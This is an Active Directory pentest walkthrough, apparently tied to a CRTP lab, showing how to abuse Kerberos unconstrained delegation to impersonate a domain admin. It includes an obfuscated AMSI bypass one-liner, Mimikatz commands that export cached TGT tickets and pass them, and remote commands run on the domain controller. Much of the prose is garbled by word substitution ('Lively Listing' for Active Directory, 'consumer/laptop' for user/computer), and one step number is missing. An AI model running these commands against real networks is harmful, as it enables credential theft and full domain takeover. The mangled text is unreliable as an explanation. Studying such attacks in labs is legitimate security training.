Belief this consumer/laptop for delegation to any service
Delegation is the act of giving somebody authority or duty to do one thing on behalf of another person. An analogous idea is utilized within the Lively Listing surroundings; delegation permits an account with the delegate property to impersonate one other account to entry sources inside the community.
There are three (3) recognized kinds of delegations allowed with Kerberos: Unconstrained, Constrained, and Useful resource-based constrained delegations. For this publish, we are going to concentrate on abusing the primary sort — Unconstrained delegation. We’ll study to abuse it throughout a pentest engagement to carry out a privilege escalation to the next degree consumer such because the area admin😈.
The assault demonstration steps might be on the Pentester Academy Lively Listing Lab by Nikhil Mittal related to the CRTP course.
📝KEY CONCEPTS
- Unconstrained Delegation Overview
- Evaluation Circulation
- Assault Necessities
- Escalation Vectors
- Used Instruments
- Demonstration Steps
- Mitigation
- References
Unconstrained delegation permits a consumer or laptop with the choice “Belief This consumer/laptop for delegation to any service” enabled to impersonate ANY consumer authenticates to it and request entry to ANY service.
The consumer can entry the service, whether or not hosted on the authenticated server or hosted on one other server on the identical or a distinct area.
To grasp it higher, let’s take an instance of a consumer authenticating to an internet server and desires to request knowledge from different servers like SQL, Utility, or Mail that aren’t hosted on that net server; they’re hosted on totally different servers as within the case under.
With out delegation, the webserver can’t present the requested info from different providers because it doesn’t have permission to speak to those providers instantly.
Nevertheless, if the delegation is enabled, the online server can impersonate the authenticated consumer (common consumer or service account) and fetch the requested info on behalf of the consumer as if it was the consumer themselves accessing the service instantly.
Impression
Suppose we compromise a service account with administrator privileges via an assault like Kerberoasting, and that account is related to a pc with the “Unconstrained Delegation” function enabled. On this case, we are able to dump the TGT tickets of all accounts authenticated to the webserver, impersonate any consumer we would like, and ask the Kerberos area controller (KDC) for any service tickets we want to entry.
The large and dangerous a part of that sort of delegation is that if the area admin have been one of many customers authenticated to the server, we might be capable to impersonate the DA with their TGT ticket and entry any useful resource on the community with area admin privileges 🎲
Let’s bounce into the delegation move with the Kerberos Authentication:
1- A consumer authenticates to the KDC (Kerberos Area Controller) by sending an encrypted request with their credentials. The KDC verifies their id, and sends the consumer a TGT ticket.
2- The consumer receives the TGT ticket and sends it again to the KDC, requesting a service ticket for a particular service, let’s say an internet service. The KDC checks the TGT validity and sends again the service ticket (TGS) for the requested service.
3- At this level, the consumer can use the service ticket (TGS) to entry the requested net service. Nevertheless, if the requested service just like the net service in our instance must entry one other service like SQL, the consumer should acquire a Forwardable TGT ticket to cross it to the online service together with the TGS ticket.
5- The net server caches the consumer’s Forwardable TGT domestically and makes use of it to request a TGS ticket from the KDC to entry the SQL service on behalf of the consumer.
6- The KDC verifies the offered TGT and offers the webserver with the SQL TGS to entry the SQL server because the consumer.
◼️ Determine The Delegated Host
We are able to use the PoweView script from PowerSploit or the AD module to find out if the delegation possibility is enabled by inspecting the Trusted delegation property worth set as True.
For the PowerView, use the Get-NetComputer -UnConstrained command.
And for the AD Module, use the Get-ADComputer cmdlet and filter for the TrustedForDelegation property.
Get-ADComputer -Filter {TrustedForDelegation -eq $true} -Properties trustedfordelegation,serviceprincipalname,description
As we see within the under instance, the command returned 2 (two) computer systems the area controller (DCORP-DC) and the app server (DCORP-APPSRV).
◼️ Entry The Recognized Server
This step assumes that you’ve entry to the delegated machine as an admin. In my entry, I compromised the machine through the use of the appadmin hash obtained whereas dumping the hashes on one other machine. I then used overpass the hash to entry the dcorp-appsrv server because the appadmin consumer.
◼️ Export All TGT Tickets
Since we’re the native admin on the delegated machine, I uploaded the Invoke-Mimkatz script with PS Remoting (the machine has WinRM Service open), and dumped all the cached TGT tickets.
▪️ Create PS session
$session = New-PSSession -Pc ComputerNAEM
Copy the Invoke-Mimikatz file to the distant machine. You have to to bypass AMSI to make use of it.
sET-ItEM ( ‘V’+’aR’ + ‘IA’ + ‘blE:1q2’ + ‘uZx’ ) ( [TYpE]( “{1}{0}”-F’F’,’rE’ ) ) ; ( GeT-VariaBle ( “1Q2U” +”zX” ) -VaL ).”A`ss`Embly”.”GET`TY`Pe”(( “{6}{3}{1}{4}{2}{0}{5}” -f’Util’,’A’,’Amsi’,’.Administration.’,’utomation.’,’s’,’System’ ) ).”g`etf`iElD”( ( “{0}{2}{1}” -f’amsi’,’d’,’InitFaile’ ),( “{2}{4}{0}{1}{3}” -f ‘Stat’,’i’,’NonPubli’,’c’,’c,’ )).”sE`T`VaLUE”( ${n`ULl},${t`RuE} )
▪️ Import the script and export all of the cached tickets.
Import-Module .Invoke-Mimikatz.ps1Invoke-Mimikatz –Command '"sekurlsa::tickets /export"'
As we see under, we have been capable of get the area admin TGT as a result of the DA logged into the dcorp-appsrv machine, and for the reason that delegated machine caches all of the TGTs, we might dump the ticket.
◼️ Impersonate Excessive Privileged Consumer
Now that we have now the TGT ticket for the area admin, we are able to use Invoke-Mimikatz or Rubeus to request service tickets from the KDC to any service with DA privileges.
For our case, I used Mimikatz to impersonate the administrator.
Invoke-Mimikatz -Command ‘“kerberos::ptt Ticket.kirbi”’
As seen under, the KDC accepted the TGT ticket from us and was capable of request an HTTP service ticket to run PowerShell remotely with the Invoke-Command cmdlet.
📌 PS Remoting makes use of HTTP because the protocol for transmitting instructions and outputs.
We are able to use Invoke-command and confirm that we’re certainly logged into the area controller 😈
Invoke-Command -ScriptBlock{whoami;hostname} -computername dcorp-dc
